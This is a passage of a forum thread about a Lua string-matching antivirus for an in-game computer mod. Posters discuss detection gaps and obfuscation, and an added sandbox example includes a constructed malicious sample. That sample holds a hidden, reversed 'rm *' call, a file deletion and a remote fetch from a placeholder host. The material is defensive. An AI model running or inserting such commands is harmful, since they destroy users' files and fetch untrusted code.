



BLAST AntiMalware Suite - 'Yet another' string.find antivirus

lua

24 replies to this topic

#21 Luca_S

  • Members
  • 407 posts
  • Location: Germany

Posted 26 August 2016 - 09:02 PM

It detects itself (Worm.Deleter.a) because of local ignore={disk=true,rom=true}
Wtf this can't be right....

Also it doesn't detect fs.delete("*") as a virus?

#22 MKlegoman357

  • Members
  • 1,170 posts
  • Location: Kaunas, Lithuania

Posted 28 August 2016 - 08:48 PM

Luca_S, on 26 August 2016 - 09:02 PM, said:

Also it doesn't detect fs.delete("*") as a virus?

That doesn't work, all fs functions (with the exception of fs.find()) don't handle wildcards. But shell.run("rm *") would probably be dangerous.

#23 manu_03

  • Members
  • 84 posts
  • Location: Spain

Posted 28 August 2016 - 09:19 PM

You could scan the file for the HTTP API. For example, running the code from mysite.com/myfile where myfile is a virus.

#24 manu_03

  • Members
  • 84 posts
  • Location: Spain

Posted 28 August 2016 - 09:25 PM

Somewhere in the past I saw a program that encrypts your code to make it hidden. A virus maker could use it to avoid string.find warnings. You should start working on a sandbox mode that replaces most of the unsafe functions with function()end and makes a log of the performed actions.
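
The sandbox mode suggested in the post above, as an added example that is not part of the original thread or of the BLAST project: the unsafe functions are replaced with logging no-ops and the suspect chunk runs in that environment. It assumes Lua 5.1 (loadstring, setfenv); runSandboxed, the UNSAFE list and the sample program are hypothetical.

```lua
-- Added example (hypothetical names); assumes Lua 5.1 with loadstring/setfenv.
local UNSAFE = {
  fs    = { "delete", "move", "copy", "open", "makeDir" },
  shell = { "run" },
  http  = { "get", "post", "request" },
  os    = { "reboot", "shutdown" },
}
local function runSandboxed(code, name)
  local log = {}
  local function record(call, ...)
    local args = {}
    for i = 1, select("#", ...) do args[i] = tostring((select(i, ...))) end
    log[#log + 1] = call .. "(" .. table.concat(args, ", ") .. ")"
  end
  -- Globals that are not shadowed below are read through from the real _G.
  local env = setmetatable({}, { __index = _G })
  env._G = env
  for lib, names in pairs(UNSAFE) do
    -- Listed functions become logging no-ops; the rest of the library passes through.
    local shadow = setmetatable({}, { __index = _G[lib] })
    for _, fname in ipairs(names) do
      shadow[fname] = function(...) record(lib .. "." .. fname, ...) end
    end
    env[lib] = shadow
  end
  -- Chunks built at run time (for example by a decoder) stay in the same environment.
  env.loadstring = function(src, chunk)
    record("loadstring", "<" .. #tostring(src) .. " bytes>")
    local fn, err = loadstring(src, chunk)
    if fn then setfenv(fn, env) end
    return fn, err
  end
  local fn, err = loadstring(code, name)
  if not fn then return false, err, log end
  setfenv(fn, env)
  local ok, runErr = pcall(fn)
  return ok, runErr, log
end

-- Constructed sample: the first call is kept out of string.find's sight by string.reverse.
local sample = [[
local hidden = string.reverse(')"* mr"(nur.llehs')
loadstring(hidden)()
fs.delete("startup")
http.get("http://example.invalid/myfile")
]]
local ok, err, log = runSandboxed(sample, "suspect")
for _, entry in ipairs(log) do print(entry) end
```

Only the listed functions and loadstring are wrapped; everything else passes through to the real environment, so the log is an audit aid rather than containment.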

#25 minebuild02

  • Members
  • 97 posts

Posted 05 September 2016 - 01:29 PM

Luca_S, on 26 August 2016 - 09:02 PM, said:

It detects itself (Worm.Deleter.a) because of local ignore={disk=true,rom=true}
Wtf this can't be right....

Also it doesn't detect fs.delete("*") as a virus?

It does detect itself, yes.

manu_03, on 28 August 2016 - 09:19 PM, said:

You could scan the file for the HTTP API. For example, running the code from mysite.com/myfile where myfile is a virus.

The RTS driver has a firewall feature; it scans for access to dangerous files.

manu_03, on 28 August 2016 - 09:25 PM, said:

Somewhere in the past I saw a program that encrypts your code to make it hidden. A virus maker could use it to avoid string.find warnings. You should start working on a sandbox mode that replaces most of the unsafe functions with function()end and makes a log of the performed actions.

PM me with any known code signatures.




